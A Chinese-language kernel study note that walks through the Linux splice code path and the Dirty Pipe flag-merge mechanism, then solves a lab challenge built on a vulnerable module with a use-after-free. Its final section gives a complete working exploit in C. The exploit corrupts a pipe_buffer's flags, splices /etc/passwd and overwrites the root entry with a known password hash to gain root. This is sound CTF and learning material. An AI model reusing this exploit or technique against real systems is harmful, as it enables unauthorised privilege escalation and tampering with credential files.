struct pipe_inode_info *ipipe;
struct pipe_inode_info *opipe;
loff_t offset, *__off_in = NULL, *__off_out = NULL;
ssize_t ret;
ipipe = get_pipe_info(in, true);
opipe = get_pipe_info(out, true);
if (ipipe) {
if (off_in)
return -ESPIPE;
pipe_clear_nowait(in);
}
if (opipe) {
if (off_out)
return -ESPIPE;
pipe_clear_nowait(out);
}
if (off_out) {
if (copy_from_user(&offset, off_out, sizeof(loff_t)))
return -EFAULT;
__off_out = &offset;
}
if (off_in) {
if (copy_from_user(&offset, off_in, sizeof(loff_t)))
return -EFAULT;
__off_in = &offset;
}
ret = do_splice(in, __off_in, out, __off_out, len, flags);
if (ret < 0)
return ret;
if (__off_out && copy_to_user(off_out, __off_out, sizeof(loff_t)))
return -EFAULT;
if (__off_in && copy_to_user(off_in, __off_in, sizeof(loff_t)))
return -EFAULT;
return ret;
}
```
首先先檢查 in 是不是可讀,out 是不是可寫
之後去 call get_pipe_info 拿到對應的 `pipe_inode_info`
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L1299
/*
* Determine where to splice to/from.
*/
ssize_t do_splice(struct file *in, loff_t *off_in, struct file *out,
loff_t *off_out, size_t len, unsigned int flags)
{
struct pipe_inode_info *ipipe;
struct pipe_inode_info *opipe;
loff_t offset;
ssize_t ret;
if (unlikely(!(in->f_mode & FMODE_READ) ||
!(out->f_mode & FMODE_WRITE)))
return -EBADF;
ipipe = get_pipe_info(in, true);
opipe = get_pipe_info(out, true);
```
接下來是三種 case
### pipe 2 pipe
第一種 pipe 2 pipe
會先確定都沒有指定 offset,以及不是自己複製給自己
之後 call `splice_pipe_to_pipe`
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L1314
if (ipipe && opipe) {
if (off_in || off_out)
return -ESPIPE;
/* Splicing to self would be fun, but... */
if (ipipe == opipe)
return -EINVAL;
if ((in->f_flags | out->f_flags) & O_NONBLOCK)
flags |= SPLICE_F_NONBLOCK;
ret = splice_pipe_to_pipe(ipipe, opipe, len, flags);
}
```
去初始化 i/o pipe_buffer、head、tail 等變數後
去 call `ipipe_prep`, 主要用來確保來源 pipe 有資料可讀,如果沒有就依情況等待 (阻塞模式) 或返回錯誤
並避免死鎖狀況
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L1715
/*
* Splice contents of ipipe to opipe.
*/
static int splice_pipe_to_pipe(struct pipe_inode_info *ipipe,
struct pipe_inode_info *opipe,
size_t len, unsigned int flags)
{
struct pipe_buffer *ibuf, *obuf;
unsigned int i_head, o_head;
unsigned int i_tail, o_tail;
int ret = 0;
bool input_wakeup = false;
retry:
ret = ipipe_prep(ipipe, flags);
if (ret)
return ret;
ret = opipe_prep(opipe, flags);
if (ret)
return ret;
/*
* Potential ABBA deadlock, work around it by ordering lock
* grabbing by pipe info address. Otherwise two different processes
* could deadlock (one doing tee from A -> B, the other from B -> A).
*/
pipe_double_lock(ipipe, opipe);
i_tail = ipipe->tail;
o_head = opipe->head;
```
之後去檢查 readers、writers、對應 pipe 是不是 empty 或 full 狀態
非阻塞跟阻塞 (SPLICE_F_NONBLOCK) 基本上就是會直接跳出還是等待
```c
do {
size_t o_len;
if (!opipe->readers) {
send_sig(SIGPIPE, current, 0);
if (!ret)
ret = -EPIPE;
break;
}
i_head = ipipe->head;
o_tail = opipe->tail;
if (pipe_empty(i_head, i_tail) && !ipipe->writers)
break;
/*
* Cannot make any progress, because either the input
* pipe is empty or the output pipe is full.
*/
if (pipe_empty(i_head, i_tail) ||
pipe_full(o_head, o_tail, opipe->max_usage)) {
/* Already processed some buffers, break */
if (ret)
break;
if (flags & SPLICE_F_NONBLOCK) {
ret = -EAGAIN;
break;
}
/*
* We raced with another reader/writer and haven't
* managed to process any buffers. A zero return
* value means EOF, so retry instead.
*/
pipe_unlock(ipipe);
pipe_unlock(opipe);
goto retry;
}
```
通過 pipe_buf 拿到對應 pipe tail (in) 跟 head (out) 的 pipe_buffer
如果指定的 len 大於 in 的 len
那就直接 copy 整個 struct 過去
之後去清空 ibuf ops 以及將 out pipe 的 head 後推 (下一個寫入 pipe_buffer 位置)
另外一個就需要部份 copy
不過邏輯差不多
```c
ibuf = pipe_buf(ipipe, i_tail);
obuf = pipe_buf(opipe, o_head);
if (len >= ibuf->len) {
/*
* Simply move the whole buffer from ipipe to opipe
*/
*obuf = *ibuf;
ibuf->ops = NULL;
i_tail++;
ipipe->tail = i_tail;
input_wakeup = true;
o_len = obuf->len;
o_head++;
opipe->head = o_head;
} else {
/*
* Get a reference to this pipe buffer,
* so we can copy the contents over.
*/
if (!pipe_buf_get(ipipe, ibuf)) {
if (ret == 0)
ret = -EFAULT;
break;
}
*obuf = *ibuf;
/*
* Don't inherit the gift and merge flags, we need to
* prevent multiple steals of this page.
*/
obuf->flags &= ~PIPE_BUF_FLAG_GIFT;
obuf->flags &= ~PIPE_BUF_FLAG_CAN_MERGE;
obuf->len = len;
ibuf->offset += len;
ibuf->len -= len;
o_len = len;
o_head++;
opipe->head = o_head;
}
ret += o_len;
len -= o_len;
} while (len);
```
### pipe 2 file
這部分檢查跟先前邏輯相同
另外會去 call `rw_verify_area` 來驗證檔案的權限
最後 call `do_splice_from`
```c
} else if (ipipe) {
if (off_in)
return -ESPIPE;
if (off_out) {
if (!(out->f_mode & FMODE_PWRITE))
return -EINVAL;
offset = *off_out;
} else {
offset = out->f_pos;
}
if (unlikely(out->f_flags & O_APPEND))
return -EINVAL;
ret = rw_verify_area(WRITE, out, &offset, len);
if (unlikely(ret < 0))
return ret;
if (in->f_flags & O_NONBLOCK)
flags |= SPLICE_F_NONBLOCK;
file_start_write(out);
ret = do_splice_from(ipipe, out, &offset, len, flags);
file_end_write(out);
if (!off_out)
out->f_pos = offset;
else
*off_out = offset;
```
之後去 call out normal file 的 `splice_write` (寫在 file ops [src](https://elixir.bootlin.com/linux/v6.15.9/source/block/fops.c#L900))
splice_write 會 call 到 `iter_file_splice_write`
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L930
/*
* Attempt to initiate a splice from pipe to file.
*/
static ssize_t do_splice_from(struct pipe_inode_info *pipe, struct file *out,
loff_t *ppos, size_t len, unsigned int flags)
{
if (unlikely(!out->f_op->splice_write))
return warn_unsupported(out, "write");
return out->f_op->splice_write(pipe, out, ppos, len, flags);
}
```
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L648
/**
* iter_file_splice_write - splice data from a pipe to a file
* @pipe: pipe info (in)
* @out: file to write to
* @ppos: position in @out
* @len: number of bytes to splice
* @flags: splice modifier flags
*
* Description:
* Will either move or copy pages (determined by @flags options) from
* the given pipe inode to the given file.
* This one is ->write_iter-based.
*
*/
ssize_t
iter_file_splice_write(struct pipe_inode_info *pipe, struct file *out,
loff_t *ppos, size_t len, unsigned int flags)
{
struct splice_desc sd = {
.total_len = len,
.flags = flags,
.pos = *ppos,
.u.file = out,
};
int nbufs = pipe->max_usage;
struct bio_vec *array;
ssize_t ret;
```
splice_desc 是用來追蹤 splice 過程的狀態
* total_len:剩下要寫入的資料長度
* num_spliced:已經成功寫入的資料
* pos:檔案偏移位置
* need_wakeup:是否需要喚醒管道的其他等待者
之後去 kcalloc max 數量個 bio_vec 並給 pipe 上鎖
```c
if (!out->f_op->write_iter)
return -EINVAL;
array = kcalloc(nbufs, sizeof(struct bio_vec), GFP_KERNEL);
if (unlikely(!array))
return -ENOMEM;
pipe_lock(pipe);
```
struct bio_vec,它是 I/O 子系統用來描述一段連續物理記憶體區間(contiguous physical memory range)的資料結構
* bv_page 指向 page
* bv_len 是這個區段的實際長度
* bv_offset 是資料在 bv_page 內的起始位置,資料不是從 page 開頭開始,就用 offset 指定
https://elixir.bootlin.com/linux/v6.15.9/source/include/linux/bvec.h#L19
```c
/**
* struct bio_vec - a contiguous range of physical memory addresses
* @bv_page: First page associated with the address range.
* @bv_len: Number of bytes in the address range.
* @bv_offset: Start of the address range relative to the start of @bv_page.
*
* The following holds for a bvec if n * PAGE_SIZE < bv_offset + bv_len:
*
* nth_page(@bv_page, n) == @bv_page + n
*
* This holds because page_is_mergeable() checks the above property.
*/
struct bio_vec {
struct page *bv_page;
unsigned int bv_len;
unsigned int bv_offset;
};
```
去初始化 sd (計數器跟狀態)
```c
splice_from_pipe_begin(&sd);
```
`splice_from_pipe_next` 去確保 pipe 中有資料可以被 splice,並處理等待或非阻塞邏輯
並且這裡也去動態的 kcalloc bio_vec 確保一開始分配不夠(?
```c
while (sd.total_len) {
struct kiocb kiocb;
struct iov_iter from;
unsigned int head, tail;
size_t left;
int n;
ret = splice_from_pipe_next(pipe, &sd);
if (ret <= 0)
break;
if (unlikely(nbufs < pipe->max_usage)) {
kfree(array);
nbufs = pipe->max_usage;
array = kcalloc(nbufs, sizeof(struct bio_vec),
GFP_KERNEL);
if (!array) {
ret = -ENOMEM;
break;
}
}
```
之後根據要轉移的長度,去建立 bio_vec
這邊動態去加 tail 直到與 head 重疊 (讀出所有的資料) 或是讀到指定的大小了
```c
/* build the vector */
left = sd.total_len;
for (n = 0; !pipe_empty(head, tail) && left && n < nbufs; tail++) {
struct pipe_buffer *buf = pipe_buf(pipe, tail);
size_t this_len = buf->len;
/* zero-length bvecs are not supported, skip them */
if (!this_len)
continue;
this_len = min(this_len, left);
ret = pipe_buf_confirm(pipe, buf);
if (unlikely(ret)) {
if (ret == -ENODATA)
ret = 0;
goto done;
}
bvec_set_page(&array[n], buf->page, this_len,
buf->offset);
left -= this_len;
n++;
}
// https://elixir.bootlin.com/linux/v6.15.9/source/include/linux/bvec.h#L37
/**
* bvec_set_page - initialize a bvec based off a struct page
* @bv: bvec to initialize
* @page: page the bvec should point to
* @len: length of the bvec
* @offset: offset into the page
*/
static inline void bvec_set_page(struct bio_vec *bv, struct page *page,
unsigned int len, unsigned int offset)
{
bv->bv_page = page;
bv->bv_len = len;
bv->bv_offset = offset;
}
```
之後去將 bio_vec 陣列轉成 iov_iter,方便統一呼叫 write_iter 寫入檔案
另外也初始化 kiocb (out 寫入位置的 kiocb)
```c
iov_iter_bvec(&from, ITER_SOURCE, array, n, sd.total_len - left);
init_sync_kiocb(&kiocb, out);
kiocb.ki_pos = sd.pos;
```
通過 write_iter 來去從 bvec 寫入到 kiocb
之後去更新 splice 當前已經寫入的位置
```c
ret = out->f_op->write_iter(&kiocb, &from);
sd.pos = kiocb.ki_pos;
```
之後動態去調整整個 pipe 狀態跟釋放
```c
if (ret <= 0)
break;
sd.num_spliced += ret;
sd.total_len -= ret;
*ppos = sd.pos;
/* dismiss the fully eaten buffers, adjust the partial one */
tail = pipe->tail;
while (ret) {
struct pipe_buffer *buf = pipe_buf(pipe, tail);
if (ret >= buf->len) {
ret -= buf->len;
buf->len = 0;
pipe_buf_release(pipe, buf);
tail++;
pipe->tail = tail;
if (pipe->files)
sd.need_wakeup = true;
} else {
buf->offset += ret;
buf->len -= ret;
ret = 0;
}
}
}
done:
kfree(array);
splice_from_pipe_end(pipe, &sd);
pipe_unlock(pipe);
if (sd.num_spliced)
ret = sd.num_spliced;
return ret;
```
### file 2 pipe
與先前驗證差不多
最後 call `splice_file_to_pipe`
```c
} else if (opipe) {
if (off_out)
return -ESPIPE;
if (off_in) {
if (!(in->f_mode & FMODE_PREAD))
return -EINVAL;
offset = *off_in;
} else {
offset = in->f_pos;
}
ret = rw_verify_area(READ, in, &offset, len);
if (unlikely(ret < 0))
return ret;
if (out->f_flags & O_NONBLOCK)
flags |= SPLICE_F_NONBLOCK;
ret = splice_file_to_pipe(in, opipe, &offset, len, flags);
if (!off_in)
in->f_pos = offset;
else
*off_in = offset;
```
首先先上鎖,並確保 out pipe 有足夠空間
之後去 call `do_splice_read`
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L1279
ssize_t splice_file_to_pipe(struct file *in,
struct pipe_inode_info *opipe,
loff_t *offset,
size_t len, unsigned int flags)
{
ssize_t ret;
pipe_lock(opipe);
ret = wait_for_space(opipe, flags);
if (!ret)
ret = do_splice_read(in, offset, opipe, len, flags);
pipe_unlock(opipe);
if (ret > 0)
wakeup_pipe_readers(opipe);
return ret;
}
```
* in → 來源檔案。
* ppos → 檔案偏移量。
* pipe → 目標 pipe。
* len → 想要讀的 byte 數。
* flags → splice 標誌(如 SPLICE_F_NONBLOCK)
之後去確認傳入檔案有可讀權限
pipe_buf_usage(pipe) → 計算 pipe 目前佔用的 buffer 數。
p_space → pipe 還能容納的 buffer 數。
不能讀超過 pipe 可容納的空間
一般檔案會走 `splice_read`
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L953
/*
* Callers already called rw_verify_area() on the entire range.
* No need to call it for sub ranges.
*/
static ssize_t do_splice_read(struct file *in, loff_t *ppos,
struct pipe_inode_info *pipe, size_t len,
unsigned int flags)
{
unsigned int p_space;
if (unlikely(!(in->f_mode & FMODE_READ)))
return -EBADF;
if (!len)
return 0;
/* Don't try to read more the pipe has space for. */
p_space = pipe->max_usage - pipe_buf_usage(pipe);
len = min_t(size_t, len, p_space << PAGE_SHIFT);
if (unlikely(len > MAX_RW_COUNT))
len = MAX_RW_COUNT;
if (unlikely(!in->f_op->splice_read))
return warn_unsupported(in, "read");
/*
* O_DIRECT and DAX don't deal with the pagecache, so we allocate a
* buffer, copy into it and splice that into the pipe.
*/
if ((in->f_flags & O_DIRECT) || IS_DAX(in->f_mapping->host))
return copy_splice_read(in, ppos, pipe, len, flags);
return in->f_op->splice_read(in, ppos, pipe, len, flags);
}
```
fop 的 `splice_read` 會 call 到 `filemap_splice_read`
看到很多文章說會 call 到 `generic_file_splice_read()` ,但這份 patch 改成了 call `filemap_splice_read`
https://lkml.indiana.edu/2305.2/05830.html
https://git.sceen.net/linux/linux-stable.git/commit/fs/ufs?h=v5.7-rc7&id=2cb1e08985e3dc59d0a4ebf770a87e3e2410d985
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/read_write.c#L28
const struct file_operations generic_ro_fops = {
.llseek = generic_file_llseek,
.read_iter = generic_file_read_iter,
.mmap = generic_file_readonly_mmap,
.splice_read = filemap_splice_read,
};
```
初始化變數後
去將 in init 到 iocb 內
先計算 pipe 還能放幾頁,再把讀取長度 len 限制在這個可用容量之內
之後去 init folio_batch
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/mm/filemap.c#L2939
/**
* filemap_splice_read - Splice data from a file's pagecache into a pipe
* @in: The file to read from
* @ppos: Pointer to the file position to read from
* @pipe: The pipe to splice into
* @len: The amount to splice
* @flags: The SPLICE_F_* flags
*
* This function gets folios from a file's pagecache and splices them into the
* pipe. Readahead will be called as necessary to fill more folios. This may
* be used for blockdevs also.
*
* Return: On success, the number of bytes read will be returned and *@ppos
* will be updated if appropriate; 0 will be returned if there is no more data
* to be read; -EAGAIN will be returned if the pipe had no space, and some
* other negative error code will be returned on error. A short read may occur
* if the pipe has insufficient space, we reach the end of the data or we hit a
* hole.
*/
ssize_t filemap_splice_read(struct file *in, loff_t *ppos,
struct pipe_inode_info *pipe,
size_t len, unsigned int flags)
{
struct folio_batch fbatch;
struct kiocb iocb;
size_t total_spliced = 0, used, npages;
loff_t isize, end_offset;
bool writably_mapped;
int i, error = 0;
if (unlikely(*ppos >= in->f_mapping->host->i_sb->s_maxbytes))
return 0;
init_sync_kiocb(&iocb, in);
iocb.ki_pos = *ppos;
/* Work out how much data we can actually add into the pipe */
used = pipe_buf_usage(pipe);
npages = max_t(ssize_t, pipe->max_usage - used, 0);
len = min_t(size_t, len, npages * PAGE_SIZE);
folio_batch_init(&fbatch);
```
folio_batch 是一個描述一群 folio 的結構
folio 代表一段連續的 page cache 記憶體 (最少一個 page)
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/include/linux/pagevec.h#L19
/**
* struct folio_batch - A collection of folios.
*
* The folio_batch is used to amortise the cost of retrieving and
* operating on a set of folios. The order of folios in the batch may be
* significant (eg delete_from_page_cache_batch()). Some users of the
* folio_batch store "exceptional" entries in it which can be removed
* by calling folio_batch_remove_exceptionals().
*/
struct folio_batch {
unsigned char nr;
unsigned char i;
bool percpu_pvec_drained;
struct folio *folios[PAGEVEC_SIZE];
};
```
設定 iocb.ki_pos,告訴要從檔案的哪個位置開始取資料
`filemap_get_pages()` 會去 file page 把對應 offset 的資料取出,之後將檔案的 pages 填入到 folio_batch 中 flio
```c
do {
cond_resched();
if (*ppos >= i_size_read(in->f_mapping->host))
break;
iocb.ki_pos = *ppos;
error = filemap_get_pages(&iocb, len, &fbatch, true);
if (error < 0)
break;
```
這段的重點應該是去從 folio 中讀取資料 (`splice_folio_into_pipe`)
```c
/*
* i_size must be checked after we know the pages are Uptodate.
*
* Checking i_size after the check allows us to calculate
* the correct value for "nr", which means the zero-filled
* part of the page is not copied back to userspace (unless
* another truncate extends the file - this is desired though).
*/
isize = i_size_read(in->f_mapping->host);
if (unlikely(*ppos >= isize))
break;
end_offset = min_t(loff_t, isize, *ppos + len);
/*
* Once we start copying data, we don't want to be touching any
* cachelines that might be contended:
*/
writably_mapped = mapping_writably_mapped(in->f_mapping);
for (i = 0; i < folio_batch_count(&fbatch); i++) {
struct folio *folio = fbatch.folios[i];
size_t n;
if (folio_pos(folio) >= end_offset)
goto out;
folio_mark_accessed(folio);
/*
* If users can be writing to this folio using arbitrary
* virtual addresses, take care of potential aliasing
* before reading the folio on the kernel side.
*/
if (writably_mapped)
flush_dcache_folio(folio);
n = min_t(loff_t, len, isize - *ppos);
n = splice_folio_into_pipe(pipe, folio, *ppos, n);
if (!n)
goto out;
len -= n;
total_spliced += n;
*ppos += n;
in->f_ra.prev_pos = *ppos;
if (pipe_is_full(pipe))
goto out;
}
folio_batch_release(&fbatch);
} while (len);
```
稍微釐清一下
file 的資料通過 filemap_get_pages 寫入到 folio_batch 的 folio 中
這裡將 folio 所有的 page 讀出來放到 pipe_buffer 中
就達成了將 file 中的資料 copy 到 pipe 中 (pipe object 與 file object 共用 struct page)
這部分我認為站在 `struct page` 角度來看,就是把 file 轉移到 folio 轉移到 pipe_buffer 中
這部分的 pipe_buffer 通過 `.key = value` 方式會去初始化了 flags 成 0,因此這部分目前沒有 dirty pipe 問題 (或許哪天這裡機制被改或有新的 patch 可以看看有沒有出問題)
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/mm/filemap.c#L2909
/*
* Splice subpages from a folio into a pipe.
*/
size_t splice_folio_into_pipe(struct pipe_inode_info *pipe,
struct folio *folio, loff_t fpos, size_t size)
{
struct page *page;
size_t spliced = 0, offset = offset_in_folio(folio, fpos);
page = folio_page(folio, offset / PAGE_SIZE);
size = min(size, folio_size(folio) - offset);
offset %= PAGE_SIZE;
while (spliced < size && !pipe_is_full(pipe)) {
struct pipe_buffer *buf = pipe_head_buf(pipe);
size_t part = min_t(size_t, PAGE_SIZE - offset, size - spliced);
*buf = (struct pipe_buffer) {
.ops = &page_cache_pipe_buf_ops,
.page = page,
.offset = offset,
.len = part,
};
folio_get(folio);
pipe->head++;
page++;
spliced += part;
offset = 0;
}
return spliced;
}
```
最後將 folio_batch 釋放掉
```c
out:
folio_batch_release(&fbatch);
file_accessed(in);
return total_spliced ? total_spliced : error;
}
EXPORT_SYMBOL(filemap_splice_read);
```
其他值被清空可以跑這個觀察
```c
#include <stdio.h>
#include <stddef.h>
struct Test_buf {
int a;
int b;
int c;
int d;
};
int main() {
struct Test_buf buf;
buf.d = 123;
buf = (struct Test_buf){
.a = 42,
.b = 99
};
printf("a = %d\n", buf.a);
printf("b = %d\n", buf.b);
printf("c = %d\n", buf.c);
printf("d = %d\n", buf.d);
return 0;
}
```
## bio_vec
這邊來細講一下有關 bio_vec (上面只是簡單敘述而已)
bio_vec 最基本的結構如下,一個 bio_vec 管理一個 page 一部分或是整個
一群 bio_vec 組成了 bio 用於表示請求的 I/O 段落可能有很多個
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/include/linux/bvec.h#L19
/**
* struct bio_vec - a contiguous range of physical memory addresses
* @bv_page: First page associated with the address range.
* @bv_len: Number of bytes in the address range.
* @bv_offset: Start of the address range relative to the start of @bv_page.
*
* The following holds for a bvec if n * PAGE_SIZE < bv_offset + bv_len:
*
* nth_page(@bv_page, n) == @bv_page + n
*
* This holds because page_is_mergeable() checks the above property.
*/
struct bio_vec {
struct page *bv_page;
unsigned int bv_len;
unsigned int bv_offset;
};
```
整個 bio 長如下這樣
一個 bio 代表一次 完整的 block I/O 請求,而每個 bio_vec 是此請求的一個實體記憶體片段
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/include/linux/blk_types.h#L214
/*
* main unit of I/O for the block layer and lower layers (ie drivers and
* stacking drivers)
*/
struct bio {
struct bio *bi_next; /* request queue link */
struct block_device *bi_bdev;
blk_opf_t bi_opf; /* bottom bits REQ_OP, top bits
* req_flags.
*/
unsigned short bi_flags; /* BIO_* below */
unsigned short bi_ioprio;
enum rw_hint bi_write_hint;
blk_status_t bi_status;
atomic_t __bi_remaining;
struct bvec_iter bi_iter;
union {
/* for polled bios: */
blk_qc_t bi_cookie;
/* for plugged zoned writes only: */
unsigned int __bi_nr_segments;
};
bio_end_io_t *bi_end_io;
void *bi_private;
#ifdef CONFIG_BLK_CGROUP
/*
* Represents the association of the css and request_queue for the bio.
* If a bio goes direct to device, it will not have a blkg as it will
* not have a request_queue associated with it. The reference is put
* on release of the bio.
*/
struct blkcg_gq *bi_blkg;
struct bio_issue bi_issue;
#ifdef CONFIG_BLK_CGROUP_IOCOST
u64 bi_iocost_cost;
#endif
#endif
#ifdef CONFIG_BLK_INLINE_ENCRYPTION
struct bio_crypt_ctx *bi_crypt_context;
#endif
#if defined(CONFIG_BLK_DEV_INTEGRITY)
struct bio_integrity_payload *bi_integrity; /* data integrity */
#endif
unsigned short bi_vcnt; /* how many bio_vec's */
/*
* Everything starting with bi_max_vecs will be preserved by bio_reset()
*/
unsigned short bi_max_vecs; /* max bvl_vecs we can hold */
atomic_t __bi_cnt; /* pin count */
struct bio_vec *bi_io_vec; /* the actual vec list */
struct bio_set *bi_pool;
/*
* We can inline a number of vecs at the end of the bio, to avoid
* double allocations for a small number of bio_vecs. This member
* MUST obviously be kept at the very end of the bio.
*/
struct bio_vec bi_inline_vecs[];
};
```
上面使用 bio_vec 這個結構體,應該是與 pipe_buffer 長相很像
## folio
https://blog.csdn.net/feelabclihu/article/details/131485936
## Dirty pipe
正如先前所說的
若沒有在 splice file2pipe 的時候去初始化 flags 就會出問題
原因如下
嘗試先隨便用 `write` 寫入東西到 pipe 中,此時結束後會被設置 `PIPE_BUF_FLAG_CAN_MERGE`
這件事我們先記著
另外來看看 file2pipe
file 的 struct page 最後會跟 pipe_buffer 共享
此時思考一件事
如果在 file2pipe 沒有去初始化 flags 會發生甚麼事
那不就會當你去 write 一個 struct page 與 file 共享的 pipe 的時候
因為 `PIPE_BUF_FLAG_CAN_MERGE` 被設置,可以去寫到前一個 page (與 file 共享),也就可以繞過檔案權限檢查,向 read only 寫入資料 (因為需要預先 write 一個東西到 pipe,此時會改變他的 offset,導致第一個 byte 無法改動,不過也夠用來提權了
額外可以參考
https://dirtypipe.cm4all.com/
## Dirty Pipe challenge
https://github.com/r1ru/linux-kernel-exploitation/tree/main/dirty-pipe
### analyze source code
他去創建了一個 `vuln` 的 device
並提供了四個功能的 ioctl
```c
static long module_ioctl(struct file *file, unsigned int cmd, unsigned long arg) {
request_t req;
long ret;
if (copy_from_user(&req, (void *)arg, sizeof(req)) != 0) {
return -1;
}
mutex_lock(&module_lock);
switch(cmd) {
case CMD_ALLOC:
ret = obj_alloc();
break;
case CMD_READ:
ret = obj_read(req.data, req.size);
break;
case CMD_WRITE:
ret = obj_write(req.data, req.size);
break;
case CMD_FREE:
ret = obj_free();
break;
default:
ret = -1;
break;
}
mutex_unlock(&module_lock);
return ret;
}
static struct file_operations module_fops = {
.unlocked_ioctl = module_ioctl,
};
static struct miscdevice vuln_dev = {
.minor = MISC_DYNAMIC_MINOR,
.name = "vuln",
.fops = &module_fops
};
static int __init module_initialize(void) {
if (misc_register(&vuln_dev) != 0) {
return -1;
}
return 0;
}
static void __exit module_cleanup(void) {
misc_deregister(&vuln_dev);
mutex_destroy(&module_lock);
}
```
這部分實現了 ioctl
其中固定會去 kzalloc 一塊 0x400 大小的 object 來用 (kmalloc-1k)
其中 free 的地方沒有去清空 pointer 所以有 UAF
```c
#define CMD_ALLOC 0xf000
#define CMD_READ 0xf001
#define CMD_WRITE 0xf002
#define CMD_FREE 0xf003
#define OBJ_SIZE 0x400
typedef struct {
size_t size;
char *data;
} request_t;
struct obj {
char buf[OBJ_SIZE];
};
static struct obj *obj = NULL;
static DEFINE_MUTEX(module_lock);
static long obj_alloc(void) {
if (obj != NULL) {
return -1;
}
obj = kzalloc(sizeof(struct obj), GFP_KERNEL);
if (obj == NULL) {
return -1;
}
return 0;
}
static long obj_read(char *data, size_t size) {
if (obj == NULL || size > OBJ_SIZE) {
return -1;
}
if (copy_to_user(data, obj->buf, size) != 0) {
return -1;
}
return 0;
}
static long obj_write(char *data, size_t size) {
if (obj == NULL || size > OBJ_SIZE) {
return -1;
}
if (copy_from_user(obj->buf, data, size) != 0) {
return -1;
}
return 0;
}
static long obj_free(void) {
kfree(obj);
return 0;
}
```
### attack
先 alloc 後 free 做一塊 UAF chunk
並去 pipe 來讓 pipe_buffer array 拿到這塊 chunk UAF
接著通過 splice 將 `/etc/passwd` 拼接到 pipe fd 中 (他會跟 pipe_buffer 共又 struct page)
通過 UAF read 將資料讀出來,並修改 flags 的地方把 `PIPE_BUF_FLAG_CAN_MERGE` 打開
就可以通過追加寫入,來寫到這個映射到 read only `/etc/passwd` 的 struct page ,重新登入後輸入修改密碼來達到提權
### exploit
```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <time.h>
#include <assert.h>
#include <stdint.h>
#include <sched.h>
#include <unistd.h>
#include <sys/mman.h>
// gcc exploit.c -o exploit --static -masm=intel
#define CMD_ALLOC 0xf000
#define CMD_READ 0xf001
#define CMD_WRITE 0xf002
#define CMD_FREE 0xf003
typedef struct {
size_t size;
char *data;
} request_t;
int fd;
int etcpasswd_fd;
void obj_alloc() {
request_t req = {};
ioctl(fd, CMD_ALLOC, &req);
}
void obj_write(size_t size, char* data) {
request_t req = {
.size = size,
.data = data
};
ioctl(fd, CMD_WRITE, &req);
}
void obj_read(size_t size, char* data) {
request_t req = {
.size = size,
.data = data
};
ioctl(fd, CMD_READ, &req);
}
void obj_free() {
request_t req = {};
ioctl(fd, CMD_FREE, &req);
}
void show_zoneinfo()
{
FILE *fp = fopen("/proc/zoneinfo", "r");
char line[256];
int in_pagesets = 0;
int current_cpu = -1;
while (fgets(line, sizeof(line), fp)) {
if (strstr(line, "pagesets")) {
in_pagesets = 1;
continue;
}
if (in_pagesets && line[0] != ' ' && line[0] != '\t') {
in_pagesets = 0;
continue;
}
if (in_pagesets) {
int cpu_id;
if (sscanf(line, " cpu: %d", &cpu_id) == 1) {
current_cpu = cpu_id;
}
int count_val;
if (sscanf(line, " count: %d", &count_val) == 1 && current_cpu != -1) {
printf("CPU %d -> count = %d\n", current_cpu, count_val);
}
}
}
fclose(fp);
}
struct pipe_buffer {
void *page;
unsigned int offset;
unsigned int len;
const void *ops;
unsigned int flags;
unsigned long private;
};
#define PIPE_BUF_FLAG_CAN_MERGE 0x10
int main(){
fd = open("/dev/vuln", O_RDONLY);
if (fd == -1){
puts("Open /dev/vuln failed");
exit(0);
}
etcpasswd_fd = open("/etc/passwd", O_RDONLY);
if (etcpasswd_fd == -1) {
puts("Open /etc/passwd failed");
exit(0);
}
obj_alloc();
obj_free();
int pipefd[2];
// create pipe let pipe buffer have UAF
pipe(pipefd);
/*
ssize_t splice(int fd_in, off_t *_Nullable off_in,
int fd_out, off_t *_Nullable off_out,
size_t size, unsigned int flags);
*/
off64_t offset = 0;
splice(etcpasswd_fd, &offset, pipefd[1], NULL, 1, 0);
struct pipe_buffer my_evil_pipe_buffer;
obj_read(sizeof(my_evil_pipe_buffer), (char*)&my_evil_pipe_buffer);
printf(
"[+] .page = %p, .offset = %#x, .len = %#x, .ops = %p, .flags = %#x, .private = %#lx\n",
my_evil_pipe_buffer.page,
my_evil_pipe_buffer.offset,
my_evil_pipe_buffer.len,
my_evil_pipe_buffer.ops,
my_evil_pipe_buffer.flags,
my_evil_pipe_buffer.private
);
/*
Overwrite flags and len
*/
my_evil_pipe_buffer.len = 0;
my_evil_pipe_buffer.flags = PIPE_BUF_FLAG_CAN_MERGE;
obj_write(sizeof(my_evil_pipe_buffer), (char*)&my_evil_pipe_buffer);
obj_read(sizeof(my_evil_pipe_buffer), (char*)&my_evil_pipe_buffer);
printf(
"[+] .page = %p, .offset = %#x, .len = %#x, .ops = %p, .flags = %#x, .private = %#lx\n",
my_evil_pipe_buffer.page,
my_evil_pipe_buffer.offset,
my_evil_pipe_buffer.len,
my_evil_pipe_buffer.ops,
my_evil_pipe_buffer.flags,
my_evil_pipe_buffer.private
);
char payload[] = "root:$1$naup$tZAttOyVXnz7BlRCnYsuv/:0:0:root:/root:/bin/sh";
int ret = write(pipefd[1], payload, sizeof(payload));
if (ret == -1) {
puts("Failed to write /etc/passwd");
exit(0);
}
return 0;
}
/*
~ $ id
uid=1000(ctf) gid=1000 groups=1000
~ $ ./exploit
[+] .page = 0xfffffb04000d4c40, .offset = 0, .len = 0x1, .ops = 0xffffffff8f215320, .flags = 0, .private = 0
[+] .page = 0xfffffb04000d4c40, .offset = 0, .len = 0, .ops = 0xffffffff8f215320, .flags = 0x10, .private = 0
~ $ cat /etc/passwd
